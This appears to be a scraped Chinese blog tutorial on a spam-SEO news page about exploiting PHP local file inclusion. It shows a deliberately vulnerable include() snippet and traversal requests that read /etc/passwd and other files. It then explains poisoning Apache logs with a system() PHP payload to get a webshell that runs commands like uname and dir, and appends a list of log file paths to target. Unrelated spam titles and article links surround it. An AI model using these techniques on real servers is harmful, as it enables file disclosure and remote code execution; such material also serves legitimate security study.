当前位置: 首页 > news >正文

云南网站搭建/百度快照优化培训班

news 2025/8/16 7:19:19
云南网站搭建,百度快照优化培训班,上海企业建站 免费,做企业网站用二级域名好吗PHP本地文件包含(LFI)漏洞利用这次学习的主要参考资料是:http://downloads.ackack.net/LocalFileInclusion.pdf实验代码:如果是在linux上,直接提交:test.php?for/etc/passwd即可显示该文件。include($_GET[for].‘.php’);//用于…

PHP本地文件包含(LFI)漏洞利用

这次学习的主要参考资料是:http://downloads.ackack.net/LocalFileInclusion.pdf

实验代码:

如果是在linux上,直接提交:test.php?for=/etc/passwd即可显示该文件。

include($_GET['for'].‘.php’);//用于测试本地包含漏洞

?>

如果是在win上,提交:test.php?for=D:\tools\readme.txt,就可以了,跨目录跨盘符。这里要注意,对于过多的”..\”,360会自动拦截,比较好的办法是使用ie或者ff。

但是光是浏览文件是不够的,我们还需要webshell。可以使用log

injection的方法。这也是我作这个记录的主要目的,这才是重点所在。

这里,思想的核心是要将php代码注入到log中,比如,我们可以将:

@system($s['y'])?>

注入进去(浏览器的自动更改实在太烦人)。注:friddle2不会对针对本机的访问过滤,我就输入本机的地址:192.168.0.1。

后访问:test.php?for=/var/log/apache/logs/error_log&x=/&y=uname,这

是针对linux。如果平台切换到win,可以访问:test.php?for=..\apache\logs\error.log&

x=.y=dir,会显示当前目录文件。

当然,我们也可以将日志记录到access.log里,但那样会更复杂一些,因为需要包含的文件会更大。

参考文献还提到了:使用linux的/proc/self/fd进行注入的方法,我对linux不熟悉,所以也没有细看,以后需要的时候再了解吧。

额外的发现:

360

浏览器有个奇怪的特性,当访问http://www.baidu.com/search/error.html../../../../../..

/tools后,会访问一下目录:D:\Program files\360se\tools

看看有没有这个文件夹,这里有问题吧?TDH

D:\Program

files\360se\360se3\http:\apache\logs\error.log&y=dir和

http://192.168.0.1:88/test.php?for=..\..\..\apache\logs\error.log&

amp;y=dir,这两者之间的关系是怎么得来的?

附录:

1、可能的log路径、

/etc/httpd/logs/access.log

/etc/httpd/logs/access_log

/etc/httpd/logs/error.log

/etc/httpd/logs/error_log

/opt/lampp/logs/access_log

/opt/lampp/logs/error_log

/usr/local/apache/log

/usr/local/apache/logs

/usr/local/apache/logs/access.log

/usr/local/apache/logs/access_log

/usr/local/apache/logs/error.log

/usr/local/apache/logs/error_log

/usr/local/etc/httpd/logs/access_log

/usr/local/etc/httpd/logs/error_log

/usr/local/www/logs/thttpd_log

/var/apache/logs/access_log

/var/apache/logs/error_log

/var/log/apache/access.log

/var/log/apache/error.log

/var/log/apache-ssl/access.log

/var/log/apache-ssl/error.log

/var/log/httpd/access_log

/var/log/httpd/error_log

/var/log/httpsd/ssl.access_log

/var/log/httpsd/ssl_log

/var/log/thttpd_log

/var/www/log/access_log

/var/www/log/error_log

/var/www/logs/access.log

/var/www/logs/access_log

/var/www/logs/error.log

/var/www/logs/error_log

C:\apache\logs\access.log

C:\apache\logs\error.log

C:\Program Files\Apache

Group\Apache\logs\access.log

C:\Program Files\Apache

Group\Apache\logs\error.log

C:\program files\wamp\apache2\logs

C:\wamp\apache2\logs

C:\wamp\logs

C:\xampp\apache\logs\access.log

C:\xampp\apache\logs\error.log

http://www.lbrq.cn/news/1565191.html

相关文章:

  • 男女第一次做网站爱/互联网项目推广平台有哪些
  • 网站 备案 注销/南宁正规的seo费用
  • 弹性web安装wordpress/seo教学网seo
  • wordpress评论详情页/seo 论坛
  • 新网$网站优化/福州网seo
  • 设计感强的网站/北京如何优化搜索引擎
  • 企业网站托管一个月多少钱/百度竞价托管外包
  • 古田网站建设/百度推广联系人
  • 无法升级wordpress/谷歌seo网站运营
  • wordpress ecshop/广东企业网站seo哪里好
  • 用layui做的网站/收录情况
  • 网站 防止采集/百度推广公司哪家比较靠谱
  • 做ppt图片用的网站有哪些问题/免费广告推广软件
  • 昆山高端网站设计建设/产品推广方案怎么写
  • 做网站页面一般设置多大尺寸/宁波seo优化项目
  • 个人安装公司怎么注册/免费的seo教程
  • 台湾网站建设公司/广州网页制作
  • 网站建设费一般多少/百度网址链接是多少
  • 山东青岛68元建网站/seo的范畴是什么
  • 免费下载app软件网站/黑马培训是正规学校吗
  • 网站公司/代做百度关键词排名
  • wordpress cms模板制作/seo推广软件哪个好
  • 企业网站建设东莞/做一个微信小程序需要多少钱
  • 怎么做监控直播网站/天桥区seo全网宣传
  • 东营网站开发/手机百度登录入口
  • 企业电子网站建设/广州最新新闻
  • 如何利用影视网站做cpa/优化关键词排名哪家好
  • 多语言网站建设/深圳网站建设推广方案
  • 一键抓取的网站怎么做/网站开发合同
  • 北京 网站建设 京icp/深圳网络推广外包
  • 稳定且高效:GSPO如何革新大型语言模型的强化学习训练?
  • 启动electron桌面项目控制台输出中文时乱码解决
  • Java中Record的应用
  • vue3,使用v-draggable拖动时卡顿的问题
  • 风电功率预测实战:从数据清洗到时空建模​​
  • 高防CDN和高防IP的各自优势